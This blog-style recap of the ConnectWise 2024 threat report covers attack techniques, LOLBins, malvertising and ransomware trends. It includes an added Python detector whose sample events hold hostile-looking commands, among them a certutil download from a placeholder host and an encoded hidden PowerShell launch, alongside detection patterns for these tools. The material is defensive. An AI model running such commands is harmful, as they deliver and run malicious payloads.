ConnectWise Threat Report Highlights: What to Watch in the Year Ahead

ConnectWise released their 2024 Threat Report for the MSP landscape. You can find the 42-page report here. If you're looking for the TLDR (too long, didn't read) version, then you're in the right place. This article will attempt to take a 42-page report and capture as much as possible in one page (ish).

This article will recap:

  • Top Security Threats
  • Popular techniques along with their year-over-year trends
  • Known vulnerabilities that continue to rise
  • Growth in ransomware attacks

To quote the late CEO of Intel, Andy Grove, "Success breeds complacency. Only the paranoid survive."

Let's jump into it.

Top 3 Threats

  • Outdated software and Microsoft Windows Server 2012 reaching end of life
  • Vulnerabilities related to endpoint protection and WFH here to stay
  • Growth in ransomware attacks

Attack Techniques and Trends

We won't focus on all techniques here, but rather the top two techniques as well as techniques on the rise from threat actors.

The top 2 spots remain unchanged year-over-year from 2022 to 2023.

  1. Exploitation for Client Execution: exploits vulnerabilities in client applications or software to execute malicious code. Attackers take advantage of commonly used programs such as Adobe or Microsoft applications to gain access to the system.
  2. Registry Run Keys: manipulates Windows Run keys or the Startup folder to gain persistence. The malware automatically launches with each subsequent startup.

The top 3 techniques trending up year-over-year:

  • Execution Guardrails (rose from no.9 in '22 to no.3 in '23): leverages cryptography to derive encryption/decryption keys from environment-specific values such as network shares, physical devices, software versions, IP addresses, or files, so the payload only runs on its intended target.
  • Valid Accounts (rose from no.8 in '22 to no.3 in '23): entails threat actors gaining access with legitimate accounts and using them to reach systems. The attacker can blend in with normal user behavior and then unleash malicious code, download additional payloads, or move laterally across the network.
  • Obfuscated Files (rose to no.5 after previously not making the top 10): involves threat actors using various methods, such as obfuscated PowerShell scripts, to conceal the malicious aspects of their payload.

Vulnerabilities & Threats on The Rise

Known Vulnerabilities

This next image is by no means a list of all the vulnerabilities out there, but it shows the best-known ones for which patches are already available.

[Image: Known vulnerabilities with available patches]

For more details on each, be sure to download the full report.

Drive-By Compromises & SEO Poisoning Threats

A drive-by compromise happens when a victim visits a website and the user downloads a malicious file. Actors set up a malicious website, optimize the pages for SEO to increase site traffic, and then have malicious kits ready for consumption.

Malvertising Threats


[Image: Malicious ad targeting users looking to use IP Scanner]

You guessed it: online ads that threat actors pay for to serve audiences and drive traffic. This helps them appear less malicious while ultimately driving users to their malicious sites.

To protect against this, it's best to be on the lookout for paid content and go directly to the website anytime you may be attempting to download a file.

Trending Malware Delivery File Types

Starting in 2022, Microsoft no longer allows you to run macros in any Word or Excel file downloaded from the internet. However, with one security gap closed, actors find new ways to prevail by delivering new file types. These include:

  • Microsoft OneNote
  • LNK
  • Password protected Zip
  • JavaScript Distributed with HTML
  • MSIX

Living-off-the-land binaries (LOLBins)

LOLBins are pre-installed executables present on most systems, or tools available as downloads from Microsoft. Since the file types discussed in the previous section have become harder to use, actors turn to tools that are already present in the environment to get the job done. These include:

  • PowerShell
  • Wscript
  • Rundll32
  • Certutil

It's important to monitor these binaries and file types for any daily activity that is outside the norm for your users.
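Detection logic for the Registry Run Keys persistence technique described earlier and for the LOLBin monitoring this section calls for, as an added example (it is not code from the ConnectWise report or from this article). It scans constructed Sysmon-style events for launches of the four LOLBins above with suspicious arguments or payloads in user-writable paths, and for writes to Run/RunOnce keys; the field names follow Sysmon, while the sample events, argument patterns and path list are assumptions.

```python
import re

# Constructed Sysmon-style events (not real telemetry): EventID 1 = process
# creation, EventID 13 = registry value set. Field names mirror Sysmon's.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A", "User": r"CORP\alice"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\Get-DiskReport.ps1", "User": r"CORP\svc_mon"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.txt "
                    "C:\\Users\\bob\\AppData\\Local\\Temp\\p.txt", "User": r"CORP\bob"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\bob\Downloads\invoice.js", "User": r"CORP\bob"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\bob\AppData\Roaming\u.vbs", "User": r"CORP\bob"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "Details": "explorer.exe", "User": "NT AUTHORITY\\SYSTEM"},
]

# The four LOLBins named in the article; argument patterns are assumed indicators.
LOLBINS = {"powershell.exe", "wscript.exe", "rundll32.exe", "certutil.exe"}
SUSPICIOUS_ARGS = {
    "powershell.exe": ("-enc", "-encodedcommand", "-w hidden", "downloadstring", "iex "),
    "certutil.exe": ("-urlcache", "-decode"),
}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)


def analyze(events):
    """Return (event index, rule name) for each event that deviates from the norm."""
    findings = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            exe = ev["Image"].rsplit("\\", 1)[-1].lower()
            if exe not in LOLBINS:
                continue  # ordinary process, not in scope for this rule set
            cmd = ev["CommandLine"].lower()
            if any(arg in cmd for arg in SUSPICIOUS_ARGS.get(exe, ())):
                findings.append((i, "lolbin-suspicious-args"))
            elif USER_WRITABLE.search(ev["CommandLine"]):
                findings.append((i, "lolbin-user-writable-path"))
        elif ev["EventID"] == 13 and RUN_KEY.search(ev["TargetObject"]):
            rule = "run-key-persistence"
            if USER_WRITABLE.search(ev["Details"]):
                rule += "-user-writable-payload"  # autostart pointing at a user-owned file
            findings.append((i, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} ({SAMPLE_EVENTS[idx]['User']})")
```

The benign PowerShell maintenance script and the Winlogon write are left alone, which is the point: alert on what is outside the norm for your users, not on every use of a built-in tool.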

Ransomware

We couldn't close out this post without mentioning, you guessed it, ransomware. It continues to be the cyber threat with the most impact on small-to-mid size businesses and the managed service providers that serve them. In fact, over $1 billion in ransomware payments were collected in 2023.

Here's the chart to highlight the trend.

[Image: 2022 - 2023 Ransomware trends]

Here's a list of the top 5 ransomware families sighted in 2023:

  • LockBit
  • PLAY Ransomware
  • BlackCat/ALPHV
  • 8base
  • Cl0p

Fun (well, not so fun) fact. Events tend to spike the most in July/August as folks are on vacation, away from their desk, or attempting to enjoy the few short summer months.

Closing Out

This page briefly highlights the threats and techniques that are being used in the expanding threat landscape. It's important to further dive into the report or reach out to your Managed Services Provider to discuss mitigation efforts.

Some things to keep in mind as you seek to mitigate your threat exposure through 2024 and beyond:

  • Regularly patch machines
  • Deploy endpoint detection and response (EDR), and managed detection and response (MDR) solutions for additional layers of security
  • Leverage immutable backups
  • Train employees internally on the threats out there and how actors operate



Comment from Liudmyla Liudkevych (Designing fintech products that make money feel simple), 3 weeks ago: Gary, that's useful
